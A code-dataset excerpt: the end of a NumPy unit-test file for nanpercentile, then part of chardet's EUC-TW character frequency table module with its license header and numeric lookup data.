                assert_(issubclass(w[0].category, RuntimeWarning))

    def test_empty(self):
        mat = np.zeros((0, 3))
        for axis in [0, None]:
            with warnings.catch_warnings(record=True) as w:
                warnings.simplefilter('always')
                assert_(np.isnan(np.nanpercentile(mat, 40, axis=axis)).all())
                assert_(len(w) == 1)
                assert_(issubclass(w[0].category, RuntimeWarning))
        for axis in [1]:
            with warnings.catch_warnings(record=True) as w:
                warnings.simplefilter('always')
                assert_equal(np.nanpercentile(mat, 40, axis=axis), np.zeros([]))
                assert_(len(w) == 0)

    def test_scalar(self):
        assert_(np.nanpercentile(0., 100) == 0.)

    def test_extended_axis_invalid(self):
        # Out-of-range or duplicated axes must raise.
        d = np.ones((3, 5, 7, 11))
        assert_raises(IndexError, np.nanpercentile, d, q=5, axis=-5)
        assert_raises(IndexError, np.nanpercentile, d, q=5, axis=(0, -5))
        assert_raises(IndexError, np.nanpercentile, d, q=5, axis=4)
        assert_raises(IndexError, np.nanpercentile, d, q=5, axis=(0, 4))
        assert_raises(ValueError, np.nanpercentile, d, q=5, axis=(1, 1))
if __name__ == "__main__":
    # Allow running this test module directly as a script.
    run_module_suite()
| bsd-3-clause |
jpmec/sappy | python_env/lib/python2.7/site-packages/pip/_vendor/requests/packages/chardet/euctwfreq.py | 3133 | 34872 | ######################## BEGIN LICENSE BLOCK ########################
# The Original Code is Mozilla Communicator client code.
#
# The Initial Developer of the Original Code is
# Netscape Communications Corporation.
# Portions created by the Initial Developer are Copyright (C) 1998
# the Initial Developer. All Rights Reserved.
#
# Contributor(s):
# Mark Pilgrim - port to Python
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA
# 02110-1301 USA
######################### END LICENSE BLOCK #########################
# EUCTW frequency table
# Converted from big5 work
# by Taiwan's Mandarin Promotion Council
# <http:#www.edu.tw:81/mandr/>
# 128 --> 0.42261
# 256 --> 0.57851
# 512 --> 0.74851
# 1024 --> 0.89384
# 2048 --> 0.97583
#
# Idea Distribution Ratio = 0.74851/(1-0.74851) =2.98
# Random Distribution Ration = 512/(5401-512)=0.105
#
# Typical Distribution Ratio about 25% of Ideal one, still much higher than RDR
# Threshold for the character-distribution analyser: 0.75 is roughly 25%
# of the ideal distribution ratio (2.98) derived in the header comment above.
EUCTW_TYPICAL_DISTRIBUTION_RATIO = 0.75

# Char to FreqOrder table ,
# Number of leading entries in the char-to-frequency-order table that are
# meaningful for detection (the tail is marked "of no interest" below).
EUCTW_TABLE_SIZE = 8102
EUCTWCharToFreqOrder = (
1,1800,1506, 255,1431, 198, 9, 82, 6,7310, 177, 202,3615,1256,2808, 110, # 2742
3735, 33,3241, 261, 76, 44,2113, 16,2931,2184,1176, 659,3868, 26,3404,2643, # 2758
1198,3869,3313,4060, 410,2211, 302, 590, 361,1963, 8, 204, 58,4296,7311,1931, # 2774
63,7312,7313, 317,1614, 75, 222, 159,4061,2412,1480,7314,3500,3068, 224,2809, # 2790
3616, 3, 10,3870,1471, 29,2774,1135,2852,1939, 873, 130,3242,1123, 312,7315, # 2806
4297,2051, 507, 252, 682,7316, 142,1914, 124, 206,2932, 34,3501,3173, 64, 604, # 2822
7317,2494,1976,1977, 155,1990, 645, 641,1606,7318,3405, 337, 72, 406,7319, 80, # 2838
630, 238,3174,1509, 263, 939,1092,2644, 756,1440,1094,3406, 449, 69,2969, 591, # 2854
179,2095, 471, 115,2034,1843, 60, 50,2970, 134, 806,1868, 734,2035,3407, 180, # 2870
995,1607, 156, 537,2893, 688,7320, 319,1305, 779,2144, 514,2374, 298,4298, 359, # 2886
2495, 90,2707,1338, 663, 11, 906,1099,2545, 20,2436, 182, 532,1716,7321, 732, # 2902
1376,4062,1311,1420,3175, 25,2312,1056, 113, 399, 382,1949, 242,3408,2467, 529, # 2918
3243, 475,1447,3617,7322, 117, 21, 656, 810,1297,2295,2329,3502,7323, 126,4063, # 2934
706, 456, 150, 613,4299, 71,1118,2036,4064, 145,3069, 85, 835, 486,2114,1246, # 2950
1426, 428, 727,1285,1015, 800, 106, 623, 303,1281,7324,2127,2354, 347,3736, 221, # 2966
3503,3110,7325,1955,1153,4065, 83, 296,1199,3070, 192, 624, 93,7326, 822,1897, # 2982
2810,3111, 795,2064, 991,1554,1542,1592, 27, 43,2853, 859, 139,1456, 860,4300, # 2998
437, 712,3871, 164,2392,3112, 695, 211,3017,2096, 195,3872,1608,3504,3505,3618, # 3014
3873, 234, 811,2971,2097,3874,2229,1441,3506,1615,2375, 668,2076,1638, 305, 228, # 3030
1664,4301, 467, 415,7327, 262,2098,1593, 239, 108, 300, 200,1033, 512,1247,2077, # 3046
7328,7329,2173,3176,3619,2673, 593, 845,1062,3244, 88,1723,2037,3875,1950, 212, # 3062
266, 152, 149, 468,1898,4066,4302, 77, 187,7330,3018, 37, 5,2972,7331,3876, # 3078
7332,7333, 39,2517,4303,2894,3177,2078, 55, 148, 74,4304, 545, 483,1474,1029, # 3094
1665, 217,1869,1531,3113,1104,2645,4067, 24, 172,3507, 900,3877,3508,3509,4305, # 3110
32,1408,2811,1312, 329, 487,2355,2247,2708, 784,2674, 4,3019,3314,1427,1788, # 3126
188, 109, 499,7334,3620,1717,1789, 888,1217,3020,4306,7335,3510,7336,3315,1520, # 3142
3621,3878, 196,1034, 775,7337,7338, 929,1815, 249, 439, 38,7339,1063,7340, 794, # 3158
3879,1435,2296, 46, 178,3245,2065,7341,2376,7342, 214,1709,4307, 804, 35, 707, # 3174
324,3622,1601,2546, 140, 459,4068,7343,7344,1365, 839, 272, 978,2257,2572,3409, # 3190
2128,1363,3623,1423, 697, 100,3071, 48, 70,1231, 495,3114,2193,7345,1294,7346, # 3206
2079, 462, 586,1042,3246, 853, 256, 988, 185,2377,3410,1698, 434,1084,7347,3411, # 3222
314,2615,2775,4308,2330,2331, 569,2280, 637,1816,2518, 757,1162,1878,1616,3412, # 3238
287,1577,2115, 768,4309,1671,2854,3511,2519,1321,3737, 909,2413,7348,4069, 933, # 3254
3738,7349,2052,2356,1222,4310, 765,2414,1322, 786,4311,7350,1919,1462,1677,2895, # 3270
1699,7351,4312,1424,2437,3115,3624,2590,3316,1774,1940,3413,3880,4070, 309,1369, # 3286
1130,2812, 364,2230,1653,1299,3881,3512,3882,3883,2646, 525,1085,3021, 902,2000, # 3302
1475, 964,4313, 421,1844,1415,1057,2281, 940,1364,3116, 376,4314,4315,1381, 7, # 3318
2520, 983,2378, 336,1710,2675,1845, 321,3414, 559,1131,3022,2742,1808,1132,1313, # 3334
265,1481,1857,7352, 352,1203,2813,3247, 167,1089, 420,2814, 776, 792,1724,3513, # 3350
4071,2438,3248,7353,4072,7354, 446, 229, 333,2743, 901,3739,1200,1557,4316,2647, # 3366
1920, 395,2744,2676,3740,4073,1835, 125, 916,3178,2616,4317,7355,7356,3741,7357, # 3382
7358,7359,4318,3117,3625,1133,2547,1757,3415,1510,2313,1409,3514,7360,2145, 438, # 3398
2591,2896,2379,3317,1068, 958,3023, 461, 311,2855,2677,4074,1915,3179,4075,1978, # 3414
383, 750,2745,2617,4076, 274, 539, 385,1278,1442,7361,1154,1964, 384, 561, 210, # 3430
98,1295,2548,3515,7362,1711,2415,1482,3416,3884,2897,1257, 129,7363,3742, 642, # 3446
523,2776,2777,2648,7364, 141,2231,1333, 68, 176, 441, 876, 907,4077, 603,2592, # 3462
710, 171,3417, 404, 549, 18,3118,2393,1410,3626,1666,7365,3516,4319,2898,4320, # 3478
7366,2973, 368,7367, 146, 366, 99, 871,3627,1543, 748, 807,1586,1185, 22,2258, # 3494
379,3743,3180,7368,3181, 505,1941,2618,1991,1382,2314,7369, 380,2357, 218, 702, # 3510
1817,1248,3418,3024,3517,3318,3249,7370,2974,3628, 930,3250,3744,7371, 59,7372, # 3526
585, 601,4078, 497,3419,1112,1314,4321,1801,7373,1223,1472,2174,7374, 749,1836, # 3542
690,1899,3745,1772,3885,1476, 429,1043,1790,2232,2116, 917,4079, 447,1086,1629, # 3558
7375, 556,7376,7377,2020,1654, 844,1090, 105, 550, 966,1758,2815,1008,1782, 686, # 3574
1095,7378,2282, 793,1602,7379,3518,2593,4322,4080,2933,2297,4323,3746, 980,2496, # 3590
544, 353, 527,4324, 908,2678,2899,7380, 381,2619,1942,1348,7381,1341,1252, 560, # 3606
3072,7382,3420,2856,7383,2053, 973, 886,2080, 143,4325,7384,7385, 157,3886, 496, # 3622
4081, 57, 840, 540,2038,4326,4327,3421,2117,1445, 970,2259,1748,1965,2081,4082, # 3638
3119,1234,1775,3251,2816,3629, 773,1206,2129,1066,2039,1326,3887,1738,1725,4083, # 3654
279,3120, 51,1544,2594, 423,1578,2130,2066, 173,4328,1879,7386,7387,1583, 264, # 3670
610,3630,4329,2439, 280, 154,7388,7389,7390,1739, 338,1282,3073, 693,2857,1411, # 3686
1074,3747,2440,7391,4330,7392,7393,1240, 952,2394,7394,2900,1538,2679, 685,1483, # 3702
4084,2468,1436, 953,4085,2054,4331, 671,2395, 79,4086,2441,3252, 608, 567,2680, # 3718
3422,4087,4088,1691, 393,1261,1791,2396,7395,4332,7396,7397,7398,7399,1383,1672, # 3734
3748,3182,1464, 522,1119, 661,1150, 216, 675,4333,3888,1432,3519, 609,4334,2681, # 3750
2397,7400,7401,7402,4089,3025, 0,7403,2469, 315, 231,2442, 301,3319,4335,2380, # 3766
7404, 233,4090,3631,1818,4336,4337,7405, 96,1776,1315,2082,7406, 257,7407,1809, # 3782
3632,2709,1139,1819,4091,2021,1124,2163,2778,1777,2649,7408,3074, 363,1655,3183, # 3798
7409,2975,7410,7411,7412,3889,1567,3890, 718, 103,3184, 849,1443, 341,3320,2934, # 3814
1484,7413,1712, 127, 67, 339,4092,2398, 679,1412, 821,7414,7415, 834, 738, 351, # 3830
2976,2146, 846, 235,1497,1880, 418,1992,3749,2710, 186,1100,2147,2746,3520,1545, # 3846
1355,2935,2858,1377, 583,3891,4093,2573,2977,7416,1298,3633,1078,2549,3634,2358, # 3862
78,3750,3751, 267,1289,2099,2001,1594,4094, 348, 369,1274,2194,2175,1837,4338, # 3878
1820,2817,3635,2747,2283,2002,4339,2936,2748, 144,3321, 882,4340,3892,2749,3423, # 3894
4341,2901,7417,4095,1726, 320,7418,3893,3026, 788,2978,7419,2818,1773,1327,2859, # 3910
3894,2819,7420,1306,4342,2003,1700,3752,3521,2359,2650, 787,2022, 506, 824,3636, # 3926
534, 323,4343,1044,3322,2023,1900, 946,3424,7421,1778,1500,1678,7422,1881,4344, # 3942
165, 243,4345,3637,2521, 123, 683,4096, 764,4346, 36,3895,1792, 589,2902, 816, # 3958
626,1667,3027,2233,1639,1555,1622,3753,3896,7423,3897,2860,1370,1228,1932, 891, # 3974
2083,2903, 304,4097,7424, 292,2979,2711,3522, 691,2100,4098,1115,4347, 118, 662, # 3990
7425, 611,1156, 854,2381,1316,2861, 2, 386, 515,2904,7426,7427,3253, 868,2234, # 4006
1486, 855,2651, 785,2212,3028,7428,1040,3185,3523,7429,3121, 448,7430,1525,7431, # 4022
2164,4348,7432,3754,7433,4099,2820,3524,3122, 503, 818,3898,3123,1568, 814, 676, # 4038
1444, 306,1749,7434,3755,1416,1030, 197,1428, 805,2821,1501,4349,7435,7436,7437, # 4054
1993,7438,4350,7439,7440,2195, 13,2779,3638,2980,3124,1229,1916,7441,3756,2131, # 4070
7442,4100,4351,2399,3525,7443,2213,1511,1727,1120,7444,7445, 646,3757,2443, 307, # 4086
7446,7447,1595,3186,7448,7449,7450,3639,1113,1356,3899,1465,2522,2523,7451, 519, # 4102
7452, 128,2132, 92,2284,1979,7453,3900,1512, 342,3125,2196,7454,2780,2214,1980, # 4118
3323,7455, 290,1656,1317, 789, 827,2360,7456,3758,4352, 562, 581,3901,7457, 401, # 4134
4353,2248, 94,4354,1399,2781,7458,1463,2024,4355,3187,1943,7459, 828,1105,4101, # 4150
1262,1394,7460,4102, 605,4356,7461,1783,2862,7462,2822, 819,2101, 578,2197,2937, # 4166
7463,1502, 436,3254,4103,3255,2823,3902,2905,3425,3426,7464,2712,2315,7465,7466, # 4182
2332,2067, 23,4357, 193, 826,3759,2102, 699,1630,4104,3075, 390,1793,1064,3526, # 4198
7467,1579,3076,3077,1400,7468,4105,1838,1640,2863,7469,4358,4359, 137,4106, 598, # 4214
3078,1966, 780, 104, 974,2938,7470, 278, 899, 253, 402, 572, 504, 493,1339,7471, # 4230
3903,1275,4360,2574,2550,7472,3640,3029,3079,2249, 565,1334,2713, 863, 41,7473, # 4246
7474,4361,7475,1657,2333, 19, 463,2750,4107, 606,7476,2981,3256,1087,2084,1323, # 4262
2652,2982,7477,1631,1623,1750,4108,2682,7478,2864, 791,2714,2653,2334, 232,2416, # 4278
7479,2983,1498,7480,2654,2620, 755,1366,3641,3257,3126,2025,1609, 119,1917,3427, # 4294
862,1026,4109,7481,3904,3760,4362,3905,4363,2260,1951,2470,7482,1125, 817,4110, # 4310
4111,3906,1513,1766,2040,1487,4112,3030,3258,2824,3761,3127,7483,7484,1507,7485, # 4326
2683, 733, 40,1632,1106,2865, 345,4113, 841,2524, 230,4364,2984,1846,3259,3428, # 4342
7486,1263, 986,3429,7487, 735, 879, 254,1137, 857, 622,1300,1180,1388,1562,3907, # 4358
3908,2939, 967,2751,2655,1349, 592,2133,1692,3324,2985,1994,4114,1679,3909,1901, # 4374
2185,7488, 739,3642,2715,1296,1290,7489,4115,2198,2199,1921,1563,2595,2551,1870, # 4390
2752,2986,7490, 435,7491, 343,1108, 596, 17,1751,4365,2235,3430,3643,7492,4366, # 4406
294,3527,2940,1693, 477, 979, 281,2041,3528, 643,2042,3644,2621,2782,2261,1031, # 4422
2335,2134,2298,3529,4367, 367,1249,2552,7493,3530,7494,4368,1283,3325,2004, 240, # 4438
1762,3326,4369,4370, 836,1069,3128, 474,7495,2148,2525, 268,3531,7496,3188,1521, # 4454
1284,7497,1658,1546,4116,7498,3532,3533,7499,4117,3327,2684,1685,4118, 961,1673, # 4470
2622, 190,2005,2200,3762,4371,4372,7500, 570,2497,3645,1490,7501,4373,2623,3260, # 4486
1956,4374, 584,1514, 396,1045,1944,7502,4375,1967,2444,7503,7504,4376,3910, 619, # 4502
7505,3129,3261, 215,2006,2783,2553,3189,4377,3190,4378, 763,4119,3763,4379,7506, # 4518
7507,1957,1767,2941,3328,3646,1174, 452,1477,4380,3329,3130,7508,2825,1253,2382, # 4534
2186,1091,2285,4120, 492,7509, 638,1169,1824,2135,1752,3911, 648, 926,1021,1324, # 4550
4381, 520,4382, 997, 847,1007, 892,4383,3764,2262,1871,3647,7510,2400,1784,4384, # 4566
1952,2942,3080,3191,1728,4121,2043,3648,4385,2007,1701,3131,1551, 30,2263,4122, # 4582
7511,2026,4386,3534,7512, 501,7513,4123, 594,3431,2165,1821,3535,3432,3536,3192, # 4598
829,2826,4124,7514,1680,3132,1225,4125,7515,3262,4387,4126,3133,2336,7516,4388, # 4614
4127,7517,3912,3913,7518,1847,2383,2596,3330,7519,4389, 374,3914, 652,4128,4129, # 4630
375,1140, 798,7520,7521,7522,2361,4390,2264, 546,1659, 138,3031,2445,4391,7523, # 4646
2250, 612,1848, 910, 796,3765,1740,1371, 825,3766,3767,7524,2906,2554,7525, 692, # 4662
444,3032,2624, 801,4392,4130,7526,1491, 244,1053,3033,4131,4132, 340,7527,3915, # 4678
1041,2987, 293,1168, 87,1357,7528,1539, 959,7529,2236, 721, 694,4133,3768, 219, # 4694
1478, 644,1417,3331,2656,1413,1401,1335,1389,3916,7530,7531,2988,2362,3134,1825, # 4710
730,1515, 184,2827, 66,4393,7532,1660,2943, 246,3332, 378,1457, 226,3433, 975, # 4726
3917,2944,1264,3537, 674, 696,7533, 163,7534,1141,2417,2166, 713,3538,3333,4394, # 4742
3918,7535,7536,1186, 15,7537,1079,1070,7538,1522,3193,3539, 276,1050,2716, 758, # 4758
1126, 653,2945,3263,7539,2337, 889,3540,3919,3081,2989, 903,1250,4395,3920,3434, # 4774
3541,1342,1681,1718, 766,3264, 286, 89,2946,3649,7540,1713,7541,2597,3334,2990, # 4790
7542,2947,2215,3194,2866,7543,4396,2498,2526, 181, 387,1075,3921, 731,2187,3335, # 4806
7544,3265, 310, 313,3435,2299, 770,4134, 54,3034, 189,4397,3082,3769,3922,7545, # 4822
1230,1617,1849, 355,3542,4135,4398,3336, 111,4136,3650,1350,3135,3436,3035,4137, # 4838
2149,3266,3543,7546,2784,3923,3924,2991, 722,2008,7547,1071, 247,1207,2338,2471, # 4854
1378,4399,2009, 864,1437,1214,4400, 373,3770,1142,2216, 667,4401, 442,2753,2555, # 4870
3771,3925,1968,4138,3267,1839, 837, 170,1107, 934,1336,1882,7548,7549,2118,4139, # 4886
2828, 743,1569,7550,4402,4140, 582,2384,1418,3437,7551,1802,7552, 357,1395,1729, # 4902
3651,3268,2418,1564,2237,7553,3083,3772,1633,4403,1114,2085,4141,1532,7554, 482, # 4918
2446,4404,7555,7556,1492, 833,1466,7557,2717,3544,1641,2829,7558,1526,1272,3652, # 4934
4142,1686,1794, 416,2556,1902,1953,1803,7559,3773,2785,3774,1159,2316,7560,2867, # 4950
4405,1610,1584,3036,2419,2754, 443,3269,1163,3136,7561,7562,3926,7563,4143,2499, # 4966
3037,4406,3927,3137,2103,1647,3545,2010,1872,4144,7564,4145, 431,3438,7565, 250, # 4982
97, 81,4146,7566,1648,1850,1558, 160, 848,7567, 866, 740,1694,7568,2201,2830, # 4998
3195,4147,4407,3653,1687, 950,2472, 426, 469,3196,3654,3655,3928,7569,7570,1188, # 5014
424,1995, 861,3546,4148,3775,2202,2685, 168,1235,3547,4149,7571,2086,1674,4408, # 5030
3337,3270, 220,2557,1009,7572,3776, 670,2992, 332,1208, 717,7573,7574,3548,2447, # 5046
3929,3338,7575, 513,7576,1209,2868,3339,3138,4409,1080,7577,7578,7579,7580,2527, # 5062
3656,3549, 815,1587,3930,3931,7581,3550,3439,3777,1254,4410,1328,3038,1390,3932, # 5078
1741,3933,3778,3934,7582, 236,3779,2448,3271,7583,7584,3657,3780,1273,3781,4411, # 5094
7585, 308,7586,4412, 245,4413,1851,2473,1307,2575, 430, 715,2136,2449,7587, 270, # 5110
199,2869,3935,7588,3551,2718,1753, 761,1754, 725,1661,1840,4414,3440,3658,7589, # 5126
7590, 587, 14,3272, 227,2598, 326, 480,2265, 943,2755,3552, 291, 650,1883,7591, # 5142
1702,1226, 102,1547, 62,3441, 904,4415,3442,1164,4150,7592,7593,1224,1548,2756, # 5158
391, 498,1493,7594,1386,1419,7595,2055,1177,4416, 813, 880,1081,2363, 566,1145, # 5174
4417,2286,1001,1035,2558,2599,2238, 394,1286,7596,7597,2068,7598, 86,1494,1730, # 5190
3936, 491,1588, 745, 897,2948, 843,3340,3937,2757,2870,3273,1768, 998,2217,2069, # 5206
397,1826,1195,1969,3659,2993,3341, 284,7599,3782,2500,2137,2119,1903,7600,3938, # 5222
2150,3939,4151,1036,3443,1904, 114,2559,4152, 209,1527,7601,7602,2949,2831,2625, # 5238
2385,2719,3139, 812,2560,7603,3274,7604,1559, 737,1884,3660,1210, 885, 28,2686, # 5254
3553,3783,7605,4153,1004,1779,4418,7606, 346,1981,2218,2687,4419,3784,1742, 797, # 5270
1642,3940,1933,1072,1384,2151, 896,3941,3275,3661,3197,2871,3554,7607,2561,1958, # 5286
4420,2450,1785,7608,7609,7610,3942,4154,1005,1308,3662,4155,2720,4421,4422,1528, # 5302
2600, 161,1178,4156,1982, 987,4423,1101,4157, 631,3943,1157,3198,2420,1343,1241, # 5318
1016,2239,2562, 372, 877,2339,2501,1160, 555,1934, 911,3944,7611, 466,1170, 169, # 5334
1051,2907,2688,3663,2474,2994,1182,2011,2563,1251,2626,7612, 992,2340,3444,1540, # 5350
2721,1201,2070,2401,1996,2475,7613,4424, 528,1922,2188,1503,1873,1570,2364,3342, # 5366
3276,7614, 557,1073,7615,1827,3445,2087,2266,3140,3039,3084, 767,3085,2786,4425, # 5382
1006,4158,4426,2341,1267,2176,3664,3199, 778,3945,3200,2722,1597,2657,7616,4427, # 5398
7617,3446,7618,7619,7620,3277,2689,1433,3278, 131, 95,1504,3946, 723,4159,3141, # 5414
1841,3555,2758,2189,3947,2027,2104,3665,7621,2995,3948,1218,7622,3343,3201,3949, # 5430
4160,2576, 248,1634,3785, 912,7623,2832,3666,3040,3786, 654, 53,7624,2996,7625, # 5446
1688,4428, 777,3447,1032,3950,1425,7626, 191, 820,2120,2833, 971,4429, 931,3202, # 5462
135, 664, 783,3787,1997, 772,2908,1935,3951,3788,4430,2909,3203, 282,2723, 640, # 5478
1372,3448,1127, 922, 325,3344,7627,7628, 711,2044,7629,7630,3952,2219,2787,1936, # 5494
3953,3345,2220,2251,3789,2300,7631,4431,3790,1258,3279,3954,3204,2138,2950,3955, # 5510
3956,7632,2221, 258,3205,4432, 101,1227,7633,3280,1755,7634,1391,3281,7635,2910, # 5526
2056, 893,7636,7637,7638,1402,4161,2342,7639,7640,3206,3556,7641,7642, 878,1325, # 5542
1780,2788,4433, 259,1385,2577, 744,1183,2267,4434,7643,3957,2502,7644, 684,1024, # 5558
4162,7645, 472,3557,3449,1165,3282,3958,3959, 322,2152, 881, 455,1695,1152,1340, # 5574
660, 554,2153,4435,1058,4436,4163, 830,1065,3346,3960,4437,1923,7646,1703,1918, # 5590
7647, 932,2268, 122,7648,4438, 947, 677,7649,3791,2627, 297,1905,1924,2269,4439, # 5606
2317,3283,7650,7651,4164,7652,4165, 84,4166, 112, 989,7653, 547,1059,3961, 701, # 5622
3558,1019,7654,4167,7655,3450, 942, 639, 457,2301,2451, 993,2951, 407, 851, 494, # 5638
4440,3347, 927,7656,1237,7657,2421,3348, 573,4168, 680, 921,2911,1279,1874, 285, # 5654
790,1448,1983, 719,2167,7658,7659,4441,3962,3963,1649,7660,1541, 563,7661,1077, # 5670
7662,3349,3041,3451, 511,2997,3964,3965,3667,3966,1268,2564,3350,3207,4442,4443, # 5686
7663, 535,1048,1276,1189,2912,2028,3142,1438,1373,2834,2952,1134,2012,7664,4169, # 5702
1238,2578,3086,1259,7665, 700,7666,2953,3143,3668,4170,7667,4171,1146,1875,1906, # 5718
4444,2601,3967, 781,2422, 132,1589, 203, 147, 273,2789,2402, 898,1786,2154,3968, # 5734
3969,7668,3792,2790,7669,7670,4445,4446,7671,3208,7672,1635,3793, 965,7673,1804, # 5750
2690,1516,3559,1121,1082,1329,3284,3970,1449,3794, 65,1128,2835,2913,2759,1590, # 5766
3795,7674,7675, 12,2658, 45, 976,2579,3144,4447, 517,2528,1013,1037,3209,7676, # 5782
3796,2836,7677,3797,7678,3452,7679,2602, 614,1998,2318,3798,3087,2724,2628,7680, # 5798
2580,4172, 599,1269,7681,1810,3669,7682,2691,3088, 759,1060, 489,1805,3351,3285, # 5814
1358,7683,7684,2386,1387,1215,2629,2252, 490,7685,7686,4173,1759,2387,2343,7687, # 5830
4448,3799,1907,3971,2630,1806,3210,4449,3453,3286,2760,2344, 874,7688,7689,3454, # 5846
3670,1858, 91,2914,3671,3042,3800,4450,7690,3145,3972,2659,7691,3455,1202,1403, # 5862
3801,2954,2529,1517,2503,4451,3456,2504,7692,4452,7693,2692,1885,1495,1731,3973, # 5878
2365,4453,7694,2029,7695,7696,3974,2693,1216, 237,2581,4174,2319,3975,3802,4454, # 5894
4455,2694,3560,3457, 445,4456,7697,7698,7699,7700,2761, 61,3976,3672,1822,3977, # 5910
7701, 687,2045, 935, 925, 405,2660, 703,1096,1859,2725,4457,3978,1876,1367,2695, # 5926
3352, 918,2105,1781,2476, 334,3287,1611,1093,4458, 564,3146,3458,3673,3353, 945, # 5942
2631,2057,4459,7702,1925, 872,4175,7703,3459,2696,3089, 349,4176,3674,3979,4460, # 5958
3803,4177,3675,2155,3980,4461,4462,4178,4463,2403,2046, 782,3981, 400, 251,4179, # 5974
1624,7704,7705, 277,3676, 299,1265, 476,1191,3804,2121,4180,4181,1109, 205,7706, # 5990
2582,1000,2156,3561,1860,7707,7708,7709,4464,7710,4465,2565, 107,2477,2157,3982, # 6006
3460,3147,7711,1533, 541,1301, 158, 753,4182,2872,3562,7712,1696, 370,1088,4183, # 6022
4466,3563, 579, 327, 440, 162,2240, 269,1937,1374,3461, 968,3043, 56,1396,3090, # 6038
2106,3288,3354,7713,1926,2158,4467,2998,7714,3564,7715,7716,3677,4468,2478,7717, # 6054
2791,7718,1650,4469,7719,2603,7720,7721,3983,2661,3355,1149,3356,3984,3805,3985, # 6070
7722,1076, 49,7723, 951,3211,3289,3290, 450,2837, 920,7724,1811,2792,2366,4184, # 6086
1908,1138,2367,3806,3462,7725,3212,4470,1909,1147,1518,2423,4471,3807,7726,4472, # 6102
2388,2604, 260,1795,3213,7727,7728,3808,3291, 708,7729,3565,1704,7730,3566,1351, # 6118
1618,3357,2999,1886, 944,4185,3358,4186,3044,3359,4187,7731,3678, 422, 413,1714, # 6134
3292, 500,2058,2345,4188,2479,7732,1344,1910, 954,7733,1668,7734,7735,3986,2404, # 6150
4189,3567,3809,4190,7736,2302,1318,2505,3091, 133,3092,2873,4473, 629, 31,2838, # 6166
2697,3810,4474, 850, 949,4475,3987,2955,1732,2088,4191,1496,1852,7737,3988, 620, # 6182
3214, 981,1242,3679,3360,1619,3680,1643,3293,2139,2452,1970,1719,3463,2168,7738, # 6198
3215,7739,7740,3361,1828,7741,1277,4476,1565,2047,7742,1636,3568,3093,7743, 869, # 6214
2839, 655,3811,3812,3094,3989,3000,3813,1310,3569,4477,7744,7745,7746,1733, 558, # 6230
4478,3681, 335,1549,3045,1756,4192,3682,1945,3464,1829,1291,1192, 470,2726,2107, # 6246
2793, 913,1054,3990,7747,1027,7748,3046,3991,4479, 982,2662,3362,3148,3465,3216, # 6262
3217,1946,2794,7749, 571,4480,7750,1830,7751,3570,2583,1523,2424,7752,2089, 984, # 6278
4481,3683,1959,7753,3684, 852, 923,2795,3466,3685, 969,1519, 999,2048,2320,1705, # 6294
7754,3095, 615,1662, 151, 597,3992,2405,2321,1049, 275,4482,3686,4193, 568,3687, # 6310
3571,2480,4194,3688,7755,2425,2270, 409,3218,7756,1566,2874,3467,1002, 769,2840, # 6326
194,2090,3149,3689,2222,3294,4195, 628,1505,7757,7758,1763,2177,3001,3993, 521, # 6342
1161,2584,1787,2203,2406,4483,3994,1625,4196,4197, 412, 42,3096, 464,7759,2632, # 6358
4484,3363,1760,1571,2875,3468,2530,1219,2204,3814,2633,2140,2368,4485,4486,3295, # 6374
1651,3364,3572,7760,7761,3573,2481,3469,7762,3690,7763,7764,2271,2091, 460,7765, # 6390
4487,7766,3002, 962, 588,3574, 289,3219,2634,1116, 52,7767,3047,1796,7768,7769, # 6406
7770,1467,7771,1598,1143,3691,4198,1984,1734,1067,4488,1280,3365, 465,4489,1572, # 6422
510,7772,1927,2241,1812,1644,3575,7773,4490,3692,7774,7775,2663,1573,1534,7776, # 6438
7777,4199, 536,1807,1761,3470,3815,3150,2635,7778,7779,7780,4491,3471,2915,1911, # 6454
2796,7781,3296,1122, 377,3220,7782, 360,7783,7784,4200,1529, 551,7785,2059,3693, # 6470
1769,2426,7786,2916,4201,3297,3097,2322,2108,2030,4492,1404, 136,1468,1479, 672, # 6486
1171,3221,2303, 271,3151,7787,2762,7788,2049, 678,2727, 865,1947,4493,7789,2013, # 6502
3995,2956,7790,2728,2223,1397,3048,3694,4494,4495,1735,2917,3366,3576,7791,3816, # 6518
509,2841,2453,2876,3817,7792,7793,3152,3153,4496,4202,2531,4497,2304,1166,1010, # 6534
552, 681,1887,7794,7795,2957,2958,3996,1287,1596,1861,3154, 358, 453, 736, 175, # 6550
478,1117, 905,1167,1097,7796,1853,1530,7797,1706,7798,2178,3472,2287,3695,3473, # 6566
3577,4203,2092,4204,7799,3367,1193,2482,4205,1458,2190,2205,1862,1888,1421,3298, # 6582
2918,3049,2179,3474, 595,2122,7800,3997,7801,7802,4206,1707,2636, 223,3696,1359, # 6598
751,3098, 183,3475,7803,2797,3003, 419,2369, 633, 704,3818,2389, 241,7804,7805, # 6614
7806, 838,3004,3697,2272,2763,2454,3819,1938,2050,3998,1309,3099,2242,1181,7807, # 6630
1136,2206,3820,2370,1446,4207,2305,4498,7808,7809,4208,1055,2605, 484,3698,7810, # 6646
3999, 625,4209,2273,3368,1499,4210,4000,7811,4001,4211,3222,2274,2275,3476,7812, # 6662
7813,2764, 808,2606,3699,3369,4002,4212,3100,2532, 526,3370,3821,4213, 955,7814, # 6678
1620,4214,2637,2427,7815,1429,3700,1669,1831, 994, 928,7816,3578,1260,7817,7818, # 6694
7819,1948,2288, 741,2919,1626,4215,2729,2455, 867,1184, 362,3371,1392,7820,7821, # 6710
4003,4216,1770,1736,3223,2920,4499,4500,1928,2698,1459,1158,7822,3050,3372,2877, # 6726
1292,1929,2506,2842,3701,1985,1187,2071,2014,2607,4217,7823,2566,2507,2169,3702, # 6742
2483,3299,7824,3703,4501,7825,7826, 666,1003,3005,1022,3579,4218,7827,4502,1813, # 6758
2253, 574,3822,1603, 295,1535, 705,3823,4219, 283, 858, 417,7828,7829,3224,4503, # 6774
4504,3051,1220,1889,1046,2276,2456,4004,1393,1599, 689,2567, 388,4220,7830,2484, # 6790
802,7831,2798,3824,2060,1405,2254,7832,4505,3825,2109,1052,1345,3225,1585,7833, # 6806
